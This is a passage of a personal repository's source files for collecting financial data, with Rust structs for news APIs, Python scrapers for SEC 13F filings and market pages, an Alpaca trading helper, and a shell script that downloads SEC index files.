{\n // println!(\"{:#?}\", json!(info));\n //}\n\n //let info_str = format!(\"{:#?}\", infos).to_string();\n //println!(\"{:#?}\", info_str);\n // let infos = finox::fetch_one::<finox::nasdaq::info::InfoRoot>(urls)\n // .await\n // .into_iter()\n // .flatten()\n // .collect::<Vec<finox::nasdaq::info::InfoRoot>>();\n //\n // let to_serve = serde_json::to_string(&infos.clone()).expect(\"fuck\");\n\n app.at(\"/infos\").get(|_| async {\n let filepath = \"../ref_data/tickers_stocks.txt\";\n let urls = roses::read_tickers(filepath)\n .iter()\n .map(|x| Security::Stock(x.to_string()).to_nasdaq_url(\"info\"))\n .collect::<Vec<String>>();\n\n Ok(serde_json::to_string(&urls.clone())?)\n });\n app.listen(\"127.0.0.1:8080\").await?;\n Ok(())\n })\n}\n" }, { "alpha_fraction": 0.5641361474990845, "alphanum_fraction": 0.5818063020706177, "avg_line_length": 27.960784912109375, "blob_id": "7a24848152de2c7de0d14f9ba693635d4805b7dd", "content_id": "0864e78efa815712781aacd4dde0cead6436a142", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4584, "license_type": "no_license", "max_line_length": 132, "num_lines": 153, "path": "/py/edgar.py", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "import requests as r\r\nimport bs4\r\nimport pandas as pd\r\n\r\nEXAMPLE_TABLE = \"https://www.sec.gov/Archives/edgar/data/1037389/000103738919000272/xslForm13F_X01/renaissance13Fq32019_holding.xml\"\r\n\r\nROOT = 'https://www.sec.gov'\r\n\r\n\r\ndef search_link(name: str, form_type:str='13F-HR', verbose:bool=False) -> str:\r\n \"\"\"\r\n constructs a link to the filings page for a company name and form type\r\n \"\"\"\r\n company = name.replace(' ', '+')\r\n ret = ROOT + '/cgi-bin/browse-edgar?action=getcompany' + '&company=' + company + '&type=' + form_type + '&count=100'\r\n if verbose: \r\n print(f'Grabbing: {ret}')\r\n return ret\r\n\r\n\r\ndef get_page(link: str, parser:str='html.parser') -> bs4.BeautifulSoup:\r\n return bs4.BeautifulSoup(r.get(link).text, 'html.parser')\r\n\r\n\r\ndef next_pages(page: bs4.BeautifulSoup) -> list:\r\n \"\"\"\r\n TODO: not being used as most companies do not have >100 13F filings, however, this needs to get fixed!\r\n\r\n \"\"\"\r\n pages = [page]\r\n next_page = page.find('span', {'id': 'next'})\r\n while next_page is not None:\r\n page = get_page(next_page.a['href'])\r\n pages.append(page)\r\n next_page = page.find('span', {'id': 'next'})\r\n\r\n return pages\r\n\r\n\r\ndef grab_docs_links(page: bs4.BeautifulSoup, output:str='dict'):\r\n \"\"\"\r\n given a bs4 page, find all of the links to filings and return either a list or dictionary.\r\n\r\n if output is dict, the keys are the filing dates and the values are links to the html data\r\n\r\n \"\"\"\r\n\r\n if output == 'dict':\r\n docs = {}\r\n elif output == 'list':\r\n docs = []\r\n\r\n all_links = page.find_all('a', {'id': 'documentsbutton'})\r\n # print(f'getting document links for {company_full_name} at {}')\r\n\r\n for l in all_links:\r\n cur_page = get_page(ROOT + l['href'])\r\n date = cur_page.find('div', {'class' : 'info'}).text\r\n cur_table = cur_page.find('table', {'class': 'tableFile'})\r\n links = cur_table.find_all('a')\r\n\r\n if len(links) < 4:\r\n continue\r\n \r\n html_link = ROOT + links[2]['href']\r\n\r\n if output == 'dict':\r\n docs[date] = html_link\r\n elif output == 'list':\r\n docs.append(html_link)\r\n return docs\r\n\r\n\r\ndef get_holding(link: str)-> pd.DataFrame:\r\n \"\"\"\r\n link is html formatted 13F-HR form link as in EXAMPLE_TABLE at start of this file\r\n \r\n \"\"\"\r\n p = get_page(link)\r\n df = get_holding_from_page(p)\r\n return df\r\n\r\n\r\ndef get_holding_from_page(page: bs4.BeautifulSoup, output='df') -> pd.DataFrame:\r\n \"\"\"\r\n given the bs4 page, uses pandas to parse the holdings table\r\n\r\n \"\"\"\r\n table = page.find('table', {'summary': 'Form 13F-NT Header Information'})\r\n\r\n if output == 'df':\r\n ret = clean_holding(pd.read_html(table.prettify())[0])\r\n\r\n return ret\r\n\r\n\r\ndef clean_holding(df: pd.DataFrame, convert:bool=False) -> pd.DataFrame:\r\n \"\"\"\r\n parses an html holdings page \r\n\r\n columns to convert: ['(x$1000)', 'PRN AMT', 'MANAGER', 'SOLE', 'SHARED', 'NONE']\r\n\r\n \"\"\"\r\n df.columns = df.iloc[2]\r\n df.drop([0, 1, 2], inplace=True)\r\n\r\n if convert:\r\n to_convert = ['(x$1000)', 'PRN AMT', 'MANAGER', 'SOLE', 'SHARED', 'NONE']\r\n df[to_convert] = df[to_convert].apply(pd.to_numeric, errors='ignore')\r\n\r\n return df\r\n\r\n\r\ndef company_history(name:str, form_type:str='13F-HR', verbose:bool=False)-> dict:\r\n \"\"\"\r\n date : df\r\n \"\"\"\r\n history = {}\r\n link = search_link(name, form_type=form_type)\r\n page = get_page(link)\r\n doc_links = grab_docs_links(page, output='dict')\r\n for date, doc_link in doc_links.items():\r\n print(f'date: {date}')\r\n df = get_holding(doc_link)\r\n history[date] = df\r\n return history\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n 1. given list of companies, gather all of the CIKs using cik_lookup (might need to use selenium :( ))\r\n 2. for each CIK, gather links to all 13F-HR forms html formatting, txt link if html nonexistent\r\n 3. for each html page, create dataframe\r\n 4. dictionary of companies:\r\n \"search_term\" : [\r\n cik : [\r\n date : dataframe\r\n ]\r\n ]\r\n\r\n \"\"\"\r\n\r\n companies = ['Renaissance Technologies']\r\n # companies = ['Renaissance Technologies', 'Two Sigma Investments', 'Bridgewater Associates',\r\n # 'AQR Capital Management', 'Millennium Management', 'Elliott Management', 'BlackRock', 'Citadel LLC']\r\n data = {name: company_history(name) for name in companies}\r\n return data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n data = main()\r\n print(data)\r\n" }, { "alpha_fraction": 0.566526472568512, "alphanum_fraction": 0.5775957703590393, "avg_line_length": 26.542682647705078, "blob_id": "794b6eeb6383804847d8cddf205c090e57e68f2a", "content_id": "c61416bc462548f26eb06453a967c0302606000b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4517, "license_type": "no_license", "max_line_length": 121, "num_lines": 164, "path": "/py/utils.py", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "import plotly.graph_objects as go\nimport bs4\nimport pandas as pd\nimport requests as r\nimport glob\nimport datetime\nimport matplotlib.pyplot as plt\n\nfrom functools import reduce\nfrom transformers import pipeline\nimport pandas as pd\n\nheaders = {\n 'User-Agent': 'My User Agent 1.0',\n}\n\ndef page(link: str, parser:str = 'html.parser') -> bs4.BeautifulSoup:\n \"\"\"\n\n \"\"\"\n p = bs4.BeautifulSoup(r.get(link, headers=headers).text, parser)\n return p\n\n\ndef get_dfs(link: str, fn=None) -> list:\n \"\"\"\n // fn only writes first, (most common)\n \"\"\"\n dfs = [pd.read_html(p.prettify()) for p in page(link).find_all('table')]\n if fn:\n dfs[0][0].to_csv(fn, index=False)\n return dfs\n\n\ndef sec_cik_listings(cik:int) -> pd.DataFrame:\n return get_dfs(f'https://www.sec.gov/Archives/edgar/data/{cik}/')\n\n\ndef sec_xml(cik:int, form='13'):\n link = f\"https://www.sec.gov/cgi-bin/browse-edgar?action=getcompany&CIK={cik}&type={form}%25&output=atom\"\n return [href.text for href in page(link, 'lxml').find_all('filing-href')]\n\n\ndef sp500_df() -> pd.DataFrame:\n return get_dfs('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')[0][0]\n\n\ndef bloomberg_commodities():\n root = 'https://www.bloomberg.com/markets/commodities'\n p = page(root)\n group = p.find('ul', {'class': 'group'})\n urls = [a['href'] for a in group.find_all('a')]\n dfs = []\n for url in urls:\n dfs.append(get_dfs(url))\n return dfs\n\n\ndef write_plots():\n dfs = getem()\n for df in dfs:\n df.plot(x='date_time', y=df.columns[1])\n print(df.columns[1])\n plt.savefig(f'{df.columns[1]}_intraday.png', dpi=300)\n\n\ndef convert_dts(dfs, colname):\n for df in dfs:\n df[colname] = pd.to_datetime(df[colname])\n return dfs\n\n\ndef col_to_txt(df, col: str, fn: str):\n df[[col]].to_csv(fn, index=False, sep='\\n', header=False)\n\n\ndef getem():\n fns = glob.glob(\n '/home/sippycups/programming/repos/sipfin/finox/data/**stock_intraday*.csv')\n print(fns)\n dfs = [pd.read_csv(fn) for fn in fns]\n dfs = convert_dts(dfs, 'date_time')\n return dfs\n\n\ndef merge_em():\n dfs = getem()\n df_merged = reduce(lambda left, right: pd.merge(left, right, on=['date_time'],\n how='outer'), dfs)\n return df_merged\n\n\ndef yf_com() -> pd.DataFrame:\n root = 'https://finance.yahoo.com/commodities'\n df = get_dfs(root)[0][0]\n return df\n\n\ndef candle_plot(tick: str):\n dt = datetime.date.today()\n root = \"~/sipfin/finox/\"\n pat = f\"{root}data/{tick}_7d*.csv\"\n path = glob.glob(pat)\n print(path)\n df = pd.read_csv(path)\n\n df2 = pd.read_csv(root + \"ref_data/sa.csv\")\n df2 = add_sentiments(df2, \"title\")\n union_rows = df2[df2.slug == tick.lower()]\n print(tick, union_rows)\n\n fig = go.Figure(data=[go.Candlestick(x=df['t'],\n open=df[f'o_{tick}:US'], high=df[f'h_{tick}:US'],\n low=df[f'o_{tick}:US'], close=df[f'c_{tick}:US'])\n ])\n shapes = []\n annotes = []\n i = 1\n for index, row in union_rows.iterrows():\n shapes.append(dict(\n x0=row['publish_on'], x1=row['publish_on'], y0=0, y1=1, xref='x', yref='paper',\n line_width=2))\n annotes.append(dict(\n x=row['publish_on'], y=i*0.1, xref='x', yref='paper',\n showarrow=False, xanchor='left', text=row['title'])\n )\n i += 1\n row = union_rows.iloc[0]\n fig.update_layout(\n title=f\"{tick}: {row.title}, {row['sentiment_label']}, {row['sentiment_score']}\",\n yaxis_title=f'{tick} candlestick',\n shapes=shapes,\n annotations=annotes,\n )\n\n fig.show()\n\n\ndef add_sentiments(df: pd.DataFrame, col: str, label_col=\"sentiment_label\", score_col=\"sentiment_score\") -> pd.DataFrame:\n nlp = pipeline('sentiment-analysis')\n sentiments = [nlp(text)[0] for text in df[col]]\n\n labels = [s['label'] for s in sentiments]\n labels = pd.Series(labels, name=label_col)\n\n scores = [s['score'] for s in sentiments]\n scores = pd.Series(scores, name=score_col)\n\n return pd.concat([df, labels, scores], axis=1)\n\n\nif __name__ == \"__main__\":\n max_plots = 5\n\n f = open(\"../finox/ref_data/intersect_sa_yf.txt\", \"r\")\n intersects = f.read().splitlines()\n\n for i, elt in enumerate(intersects):\n # try: \n candle_plot(elt)\n # except:\n # continue\n # if i >= max_plots:\n # break\n" }, { "alpha_fraction": 0.652980625629425, "alphanum_fraction": 0.6549546122550964, "avg_line_length": 29.890243530273438, "blob_id": "1abb8ef199fabbede15ce142a72c59fc9a7d17b4", "content_id": "94d24342c548eacaaf792af9fb5b0e69f9627046", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2533, "license_type": "no_license", "max_line_length": 95, "num_lines": 82, "path": "/finox/src/news/guardian.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use serde_json::Value;\nuse std::{collections::HashMap, time::Duration};\n\npub const GUARDIAN_DELAY: Duration = Duration::from_millis(100);\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SectionsRoot {\n pub response: SectionsResponse,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SectionsResponse {\n pub status: String,\n pub user_tier: String,\n pub total: i64,\n pub results: Vec<SectionsResult>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SectionsResult {\n pub id: String,\n pub web_title: String,\n pub web_url: String,\n pub api_url: String,\n #[serde(flatten)]\n extra: HashMap<String, Value>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ArticleRoot {\n pub response: ArticleResponse,\n}\n\nimpl crate::HasRecs for ArticleRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.response.results.iter().map(|x| x.to_rec()).collect()\n }\n}\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ArticleResponse {\n pub results: Vec<ArticleResult>,\n #[serde(flatten)]\n extra: HashMap<String, Value>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ArticleResult {\n pub id: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub section_id: String,\n pub section_name: String,\n pub web_publication_date: String,\n pub web_title: String,\n pub web_url: String,\n pub api_url: String,\n pub is_hosted: bool,\n pub pillar_id: Option<String>,\n pub pillar_name: Option<String>,\n}\n\nimpl ArticleResult {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.id.to_string(),\n self.type_field.to_string(),\n self.section_id.to_string(),\n self.section_name.to_string(),\n self.web_publication_date.to_string(),\n self.web_title.to_string(),\n self.api_url.to_string(),\n self.is_hosted.to_string(),\n self.pillar_id.clone().unwrap_or(\"\".to_string()),\n ];\n }\n}\n" }, { "alpha_fraction": 0.7290076613426208, "alphanum_fraction": 0.7340967059135437, "avg_line_length": 17.255813598632812, "blob_id": "debdcd47ceb4b44e4ee78fb659eb89a293732851", "content_id": "974dea569aeb61b5822fc8170b3b483d83af69a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 786, "license_type": "no_license", "max_line_length": 65, "num_lines": 43, "path": "/notes.md", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "# Completed projects:\n* Scrapers: FRED, YF, 13fs, Nasdaq\n\n\n\n# Current Projects:\n* Set up google cloud: get scrapers running continuously\n\n* Build extemely simple equity model.\n* Build basic Alpaca papertrader, portfolio return analysis.\n* Refine equity model (gradually).\n\n* Build Risk Parity Package (as generalizable as possible - adam)\n\n\n\n# Long Term Projects:\nBuild macroeconomic models with FRED data\n\nAdd news/MLP\n\nThink harder about authorization/security\n\n\n# Basic Tutorials:\n## Github\n### Add to Git\nAdd filename, write commmit message, push to forked repo\n```bash\ngit add filename\ngit commit -m message\ngit push\n```\n\nShorthand:\n```bash \ngit add . && git commit -m \" \" && git push\n```\n\n\n# Videos\n## Neural nets\n[3blue1brown intro](https://www.youtube.com/watch?v=aircAruvnKk)\n\n" }, { "alpha_fraction": 0.609968364238739, "alphanum_fraction": 0.6147152185440063, "avg_line_length": 25.33333396911621, "blob_id": "00cda1914720e3e5ba6a8d2b24e426c520a27f02", "content_id": "80e4199571a1dfd339bf89c75b7528cb57dfb6e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1264, "license_type": "no_license", "max_line_length": 95, "num_lines": 48, "path": "/finox/src/news/moodys.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "// https://www.moodys.com/_layouts/mdc/am/Request/request.php?profile=homepage\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub status: i64,\n pub message: String,\n pub polltime: i64,\n pub timestamp: String,\n pub count: i64,\n pub headlines: Vec<Headline>,\n}\n\nimpl crate::HasRecs for Root {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.headlines.iter().map(|x| x.to_rec()).collect()\n }\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Headline {\n pub backfill: bool,\n pub is_web_feed: bool,\n pub title: String,\n #[serde(rename = \"read_key\")]\n pub read_key: String,\n pub source: String,\n #[serde(rename = \"receive_date\")]\n pub receive_date: String,\n pub synopsis: String,\n pub url: String,\n pub symbols: Vec<String>,\n pub codes: Vec<String>,\n \n}\n\nimpl Headline {\n pub fn to_rec(&self) -> Vec<String> {\n vec![\n self.title.to_string(),\n self.source.to_string(),\n self.receive_date.to_string(),\n self.synopsis.to_string(),\n ]\n }\n}\n" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.6384439468383789, "avg_line_length": 17.95652198791504, "blob_id": "5c94ea1d06d2fa79e0d6c9780e23710706c1edba", "content_id": "019174ba081a6dd3a5322b38f8e57b713de1c570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 437, "license_type": "no_license", "max_line_length": 93, "num_lines": 23, "path": "/utils.sh", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\noptions() {\n curl \"ftp://ftp.nasdaqtrader.com/symboldirectory/options.txt\" -o \"./ref_data/options.txt\"\n}\n\nfor YEAR in {1993..2020}\ndo \n\tfor QTR in {1..4}\n\tdo \n\t\tURL=\"https://www.sec.gov/Archives/edgar/full-index/$YEAR/QTR$QTR/master.idx\" \n\t\tOPATH=\"./ref_data/sec/master_$YEAR$QTR.idx\"\n\t\techo \"$URL, to $OPATH\"\n\t\tcurl $URL -o $OPATH\n\tdone\ndone\n\n\nfor f in ./ref_data/sec/*.idx\ndo \n\tsed -i -e 1,9d $f\n\tsed -i -e 2d $f\ndone\n\n" }, { "alpha_fraction": 0.5916954874992371, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 23.08333396911621, "blob_id": "a3a9e82b4bf82ec2949aa16fce6784693acbc471", "content_id": "cf2b8484a17f4b208baf0619286444a7c1444679", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 289, "license_type": "no_license", "max_line_length": 96, "num_lines": 12, "path": "/listen/Cargo.toml", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "[package]\nname = \"listen\"\nversion = \"0.1.0\"\nauthors = [\"anandijain <[email protected]>\"]\nedition = \"2018\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nhound = \"3.4.0\"\ncsv = \"1.1.3\"\nfinox = { version = \"0.1.0\", path = \"../finox\" }\n" }, { "alpha_fraction": 0.5608623623847961, "alphanum_fraction": 0.5747926831245422, "avg_line_length": 28.568628311157227, "blob_id": "9b64158289c18929c5a36685960cac9fe114fbf8", "content_id": "900daba852b5907b4bbdcef3386ff9e3885def78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3015, "license_type": "no_license", "max_line_length": 95, "num_lines": 102, "path": "/finox/src/misc/xue.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n// use crate::utils;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub data: Vec<Daum>,\n #[serde(rename = \"error_code\")]\n pub error_code: i64,\n #[serde(rename = \"error_description\")]\n pub error_description: ::serde_json::Value,\n}\n\nimpl Root {\n pub fn to_records(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for t in self.data.iter() {\n // println!(\"{:#?}\", t);\n recs.push(Daum::to_record(t));\n }\n return recs;\n }\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Daum {\n pub symbol: String,\n pub current: f64,\n pub percent: f64,\n pub chg: f64,\n pub timestamp: i64,\n pub volume: i64,\n pub amount: f64,\n #[serde(rename = \"market_capital\")]\n pub market_capital: f64,\n #[serde(rename = \"float_market_capital\")]\n pub float_market_capital: ::serde_json::Value,\n #[serde(rename = \"turnover_rate\")]\n pub turnover_rate: f64,\n pub amplitude: f64,\n pub open: f64,\n #[serde(rename = \"last_close\")]\n pub last_close: f64,\n pub high: f64,\n pub low: f64,\n #[serde(rename = \"avg_price\")]\n pub avg_price: f64,\n #[serde(rename = \"trade_volume\")]\n pub trade_volume: i64,\n pub side: i64,\n #[serde(rename = \"is_trade\")]\n pub is_trade: bool,\n pub level: i64,\n #[serde(rename = \"trade_session\")]\n pub trade_session: i64,\n #[serde(rename = \"trade_type\")]\n pub trade_type: ::serde_json::Value,\n #[serde(rename = \"current_year_percent\")]\n pub current_year_percent: f64,\n #[serde(rename = \"trade_unique_id\")]\n pub trade_unique_id: String,\n #[serde(rename = \"type\")]\n pub type_field: i64,\n #[serde(rename = \"bid_appl_seq_num\")]\n pub bid_appl_seq_num: ::serde_json::Value,\n #[serde(rename = \"offer_appl_seq_num\")]\n pub offer_appl_seq_num: ::serde_json::Value,\n}\n\n\nimpl Daum {\n pub fn to_record(&self) -> Vec<String> {\n let rec: Vec<String> = vec!(\n self.symbol.to_string(),\n self.timestamp.to_string(),\n self.current.to_string(),\n self.trade_volume.to_string(),\n self.volume.to_string(),\n self.open.to_string(),\n self.high.to_string(),\n self.low.to_string(),\n self.last_close.to_string(),\n self.avg_price.to_string(),\n self.amount.to_string(),\n self.percent.to_string(),\n self.chg.to_string(),\n self.market_capital.to_string(),\n self.turnover_rate.to_string(),\n self.amplitude.to_string(),\n self.current_year_percent.to_string(),\n self.level.to_string(),\n self.trade_session.to_string(),\n );\n\n return rec;\n }\n}" }, { "alpha_fraction": 0.6146179437637329, "alphanum_fraction": 0.619601309299469, "avg_line_length": 21.296297073364258, "blob_id": "da2a4855fc95dc8a4871f15a962f38b7c3ed60df", "content_id": "d82f6072695d0c248dc6cdda80567a642bddeddf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 74, "num_lines": 27, "path": "/py/alp.py", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "import requests as r\nimport json\nfrom config import *\nimport alpaca_trade_api as tradeapi\n\n\napi = tradeapi.REST()\ndef test_get():\n barset = api.get_barset('AAPL', 'day', limit=5)\n aapl_bars = barset['AAPL']\n return aapl_bars\n\nACC_URL = f'{BASE_URL}/v2/account'\nORD_URL = f'{BASE_URL}/v2/orders'\n\nHEADERS = {'APCA-API-KEY-ID' : API_KEY, 'APCA-API-SECRET-KEY': SECRET_KEY}\n\ndef get_acc():\n req = r.get(ACC_URL, headers=HEADERS)\n return json.loads(req.content)\n\n\nif __name__ == \"__main__\":\n # /ret = get_acc()\n # print(f'ret: {ret}')\n aapl = test_get() \n print(f'aapl: {aapl}')\n" }, { "alpha_fraction": 0.6090164184570312, "alphanum_fraction": 0.6136270761489868, "avg_line_length": 28.847095489501953, "blob_id": "163e2aa9aa0d1b0fbe09a7fdd5b93e0c49c70824", "content_id": "2dc026c7f1182aed074e288bc1a4bb52999273e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 9763, "license_type": "no_license", "max_line_length": 97, "num_lines": 327, "path": "/finox/src/news/nyt.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "pub fn nyt_archive_urls() -> Vec<String> {\n let mut urls = vec![];\n for i in 1853..2019 {\n for j in 1..=12 {\n let url = format!(\n \"https://api.nytimes.com/svc/archive/v1/{}/{}.json?api-key={}\",\n i,\n j,\n crate::keys::NYT_KEY.to_string()\n );\n urls.push(url);\n }\n }\n urls\n}\n\n// https://api.nytimes.com/svc/news/v3/content/all/all.json\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NYTFeed {\n pub status: String,\n pub copyright: Option<String>,\n #[serde(rename = \"num_results\")]\n pub num_results: i64,\n pub results: Vec<NYTFeedArticle>,\n}\n\nimpl crate::HasRecs for NYTFeed {\n fn to_recs(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for article in self.results.iter() {\n recs.push(NYTFeedArticle::to_rec(article));\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NYTFeedArticle {\n #[serde(rename = \"slug_name\")]\n pub slug_name: String,\n pub section: String,\n pub subsection: String,\n pub title: String,\n #[serde(rename = \"abstract\")]\n pub abstract_field: String,\n pub url: String,\n pub byline: String,\n #[serde(rename = \"item_type\")]\n pub item_type: String,\n pub source: String,\n #[serde(rename = \"updated_date\")]\n pub updated_date: String,\n #[serde(rename = \"created_date\")]\n pub created_date: String,\n #[serde(rename = \"published_date\")]\n pub published_date: String,\n #[serde(rename = \"first_published_date\")]\n pub first_published_date: String,\n #[serde(rename = \"material_type_facet\")]\n pub material_type_facet: String,\n pub kicker: String,\n pub subheadline: String,\n #[serde(rename = \"des_facet\")]\n #[serde(default)]\n pub des_facet: Option<Vec<String>>,\n #[serde(rename = \"org_facet\")]\n #[serde(default)]\n pub org_facet: Option<Vec<String>>,\n #[serde(rename = \"per_facet\")]\n #[serde(default)]\n pub per_facet: Option<Vec<String>>,\n #[serde(rename = \"geo_facet\")]\n #[serde(default)]\n pub geo_facet: Option<Vec<String>>,\n #[serde(rename = \"related_urls\")]\n pub related_urls: ::serde_json::Value,\n pub multimedia: Option<Vec<NYTFeedMultimedia>>,\n #[serde(rename = \"thumbnail_standard\")]\n pub thumbnail_standard: Option<String>,\n}\n\nimpl NYTFeedArticle {\n pub fn to_rec(&self) -> Vec<String> {\n //limiting 1 for tags\n //let thumbnail_url = utils::lilmatcher(self.thumbnail_standard.clone());\n\n let rec: Vec<String> = vec![\n self.slug_name.to_string(),\n self.first_published_date.to_string(),\n self.section.to_string(),\n self.subsection.to_string(),\n self.byline.to_string(),\n self.title.to_string(),\n self.subheadline.to_string(),\n self.abstract_field.to_string(),\n self.material_type_facet.to_string(),\n //self.geo_facet.unwrap_or(\"\"),\n //self.org_facet[0].unwrap_or(\"\"),\n //self.des_facet[0].unwrap_or(\"\"),\n //self.per_facet[0].unwrap_or(\"\"),\n self.source.to_string(),\n self.published_date.to_string(),\n self.created_date.to_string(),\n self.updated_date.to_string(),\n self.url.to_string(),\n //self.thumbnail_standard.unwrap_or(\"\").to_string(),\n self.kicker.to_string(),\n self.item_type.to_string(),\n ];\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NYTFeedMultimedia {\n pub url: Option<String>,\n pub format: Option<String>,\n pub height: Option<i64>,\n pub width: Option<i64>,\n #[serde(rename = \"type\")]\n pub type_field: Option<String>,\n pub subtype: Option<String>,\n pub caption: Option<String>,\n pub copyright: Option<String>,\n}\n\n// https://api.nytimes.com/svc/archive/v1/1926/1.json\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct NYTArchive {\n// pub copyright: Option<String>,\n// pub response: NYTArchiveResponse,\n//}\n//\n//impl NYTArchive {\n// pub fn to_recs(&self) -> Vec<Vec<String>> {\n// let mut recs: Vec<Vec<String>> = Vec::new();\n// for article in self.response.docs.iter() {\n// recs.push(NYTArchiveArticle::to_rec(article));\n// }\n// return recs;\n// }\n//}\n//\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct NYTArchiveResponse {\n// pub meta: NYTArchiveMeta,\n// pub docs: Vec<NYTArchiveArticle>,\n//}\n//\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct NYTArchiveMeta {\n// pub hits: i64,\n//}\n//\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct NYTArchiveArticle {\n// #[serde(rename = \"web_url\")]\n// pub web_url: String,\n// pub snippet: Option<String>,\n// #[serde(rename = \"lead_paragraph\")]\n// pub lead_paragraph: Option<String>,\n// #[serde(rename = \"abstract\")]\n// pub abstract_field: Option<String>,\n// #[serde(rename = \"print_page\")]\n// pub print_page: Option<String>,\n// pub blog: Option<Vec<::serde_json::Value>>,\n// pub source: String,\n// pub multimedia: Vec<::serde_json::Value>,\n// pub headline: NYTArchiveHeadline,\n// pub keywords: Vec<Keyword>,\n// #[serde(rename = \"pub_date\")]\n// pub pub_date: String,\n// #[serde(rename = \"document_type\")]\n// pub document_type: String,\n// #[serde(rename = \"news_desk\")]\n// pub news_desk: Option<serde_json::Value>,\n// #[serde(rename = \"section_name\")]\n// pub section_name: Option<serde_json::Value>,\n// #[serde(rename = \"subsection_name\")]\n// pub subsection_name: Option<serde_json::Value>,\n// pub byline: Option<Byline>,\n// #[serde(rename = \"type_of_material\")]\n// pub type_of_material: Option<String>,\n// #[serde(rename = \"_id\")]\n// pub id: String,\n// #[serde(rename = \"word_count\")]\n// pub word_count: i64,\n// #[serde(rename = \"slideshow_credits\")]\n// pub slideshow_credits: Option<serde_json::Value>,\n//}\n//\n//impl NYTArchiveArticle {\n// pub fn to_rec(&self) -> Vec<String> {\n// // let first_name = lilmatcher(self.byline.person.firstname);\n// // let first_name = lilmatcher(self.byline.person.middlename);\n// // let first_name = lilmatcher(self.byline.person.lastname);\n//\n// let rec: Vec<String> = vec![\n// 